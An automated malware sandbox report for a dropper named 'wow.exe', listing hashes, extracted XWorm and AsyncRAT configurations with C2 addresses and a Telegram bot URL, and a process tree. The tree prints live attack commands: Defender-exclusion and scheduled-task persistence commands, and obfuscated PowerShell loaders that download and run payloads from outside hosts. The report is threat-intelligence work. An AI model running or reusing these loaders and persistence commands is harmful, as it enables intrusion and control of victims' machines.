Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17-12-2024 20:21

General

  • Target

    wow.exe

  • Size

    14.8MB

  • MD5

    b2c17e4aaa1ab07e2be2c6e08120c7fe

  • SHA1

    67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74

  • SHA256

    d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d

  • SHA512

    5ec8edc34ebd4329c263fd43a76fbecc69d4af248b86d40ba69df40ba85b78bf0e5abb2fcb3b65708b726cdc3fe594e06f27ae637f98a038b9249c399b52b223

  • SSDEEP

    393216:gOWd863huc1dQJlAoF3MnG3WaiVLedWmoNr/xHWgrHz:5893hr1dQJ3MGGZKUpT

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://194.38.23.2

Extracted

Family

xworm

C2

127.0.0.1:48990

147.185.221.22:48990

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    svchostt.exe

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

SolaraFake

C2

anyone-blogging.gl.at.ply.gg:22284

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    Windows.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

14.243.221.170:3322

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:17027

2.tcp.ngrok.io:6606

2.tcp.ngrok.io:7707

2.tcp.ngrok.io:8808

2.tcp.ngrok.io:8080

2.tcp.ngrok.io:17027

Mutex

ynBzTukwLg8N

Attributes
  • delay

    3

  • install

    false

  • install_file

    Clean.bat

  • install_folder

    %Temp%

aes.plain
aes.plain

Extracted

Family

xworm

Version

5.0

C2

lohoainam2008-36048.portmap.io:36048

Attributes
  • Install_directory

    %AppData%

  • install_file

    Setup.exe

  • telegram

    https://api.telegram.org/bot6189190228:AAF5CGiKGC5p4mkyZfTy1Lp5BrZMWsKu-pk/sendMessage?chat_id=5666777098

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.125.189.155:8848

Mutex

DcRatMutex_6565

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 4 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 55 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the host's network.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\wow.exe
    "C:\Users\Admin\AppData\Local\Temp\wow.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:556
    • C:\Users\Admin\AppData\Local\Temp\wow.exe
      "C:\Users\Admin\AppData\Local\Temp\wow.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\haus\ldr.ps1"
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:3984
      • C:\Users\Admin\Downloads\haus\TCP.exe
        "C:\Users\Admin\Downloads\haus\TCP.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1608
      • C:\Users\Admin\Downloads\haus\anne.exe
        "C:\Users\Admin\Downloads\haus\anne.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4268
      • C:\Users\Admin\Downloads\haus\Solara_Protect.exe
        "C:\Users\Admin\Downloads\haus\Solara_Protect.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2560
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA548.tmp.bat""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\SysWOW64\timeout.exe
            timeout 3
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:5024
          • C:\Users\Admin\AppData\Local\Temp\Windows.exe
            "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
      • C:\Users\Admin\Downloads\haus\backd00rhome.exe
        "C:\Users\Admin\Downloads\haus\backd00rhome.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3360
      • C:\Users\Admin\Downloads\haus\com%20surrogate.exe
        "C:\Users\Admin\Downloads\haus\com%20surrogate.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\haus\com%20surrogate.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com%20surrogate.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchostt.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1068
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\Admin\svchostt.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2432
      • C:\Users\Admin\Downloads\haus\shell.exe
        "C:\Users\Admin\Downloads\haus\shell.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2120
      • C:\Users\Admin\Downloads\haus\kali_tools.exe
        "C:\Users\Admin\Downloads\haus\kali_tools.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2268
      • C:\Users\Admin\Downloads\haus\OLDxTEAM.exe
        "C:\Users\Admin\Downloads\haus\OLDxTEAM.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 752
          4⤵
          • Program crash
          PID:1156
      • C:\Users\Admin\Downloads\haus\XClient.exe
        "C:\Users\Admin\Downloads\haus\XClient.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\haus\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Setup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Setup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2964
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Setup" /tr "C:\Users\Admin\AppData\Roaming\Setup.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5000
      • C:\Users\Admin\Downloads\haus\evetbeta.exe
        "C:\Users\Admin\Downloads\haus\evetbeta.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4436
      • C:\Users\Admin\Downloads\haus\AsyncClient.exe
        "C:\Users\Admin\Downloads\haus\AsyncClient.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\haus\DC2111BAT.bat" "
        3⤵
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:3632
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
        • C:\Windows\system32\find.exe
          find "QEMU"
          4⤵
          PID:4828
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$
Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$
D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2464
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2672
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:564
            • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
              "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
              5⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:4660
  • C:\Windows\System32\GameBarPresenceWriter.exe
    "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
    1⤵
    • Network Service Discovery
    PID:2392
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3612
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2028 -ip 2028
    1⤵
    PID:2832
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
    1⤵
    • Checks processor information in registry
    • Modifies registry class
    PID:452
  • C:\Users\Admin\svchostt.exe
    C:\Users\Admin\svchostt.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5692
  • C:\Users\Admin\AppData\Roaming\Setup.exe
    C:\Users\Admin\AppData\Roaming\Setup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5696
  • C:\Users\Admin\svchostt.exe
    C:\Users\Admin\svchostt.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:6068
  • C:\Users\Admin\AppData\Roaming\Setup.exe
    C:\Users\Admin\AppData\Roaming\Setup.exe
    1⤵
    • Executes dropped EXE
    PID:6064


      Downloads

      • C:\Users\Admin\AppData\Local\Temp\TCDEEF1.tmp\gb.xsl

        Filesize

        262KB

        MD5

        51d32ee5bc7ab811041f799652d26e04

        SHA1

        412193006aa3ef19e0a57e16acf86b830993024a

        SHA256

        6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

        SHA512

        5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\VCRUNTIME140.dll

        Filesize

        96KB

        MD5

        f12681a472b9dd04a812e16096514974

        SHA1

        6fd102eb3e0b0e6eef08118d71f28702d1a9067c

        SHA256

        d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

        SHA512

        7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\VCRUNTIME140_1.dll

        Filesize

        37KB

        MD5

        75e78e4bf561031d39f86143753400ff

        SHA1

        324c2a99e39f8992459495182677e91656a05206

        SHA256

        1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e

        SHA512

        ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_asyncio.pyd

        Filesize

        62KB

        MD5

        2859c39887921dad2ff41feda44fe174

        SHA1

        fae62faf96223ce7a3e6f7389a9b14b890c24789

        SHA256

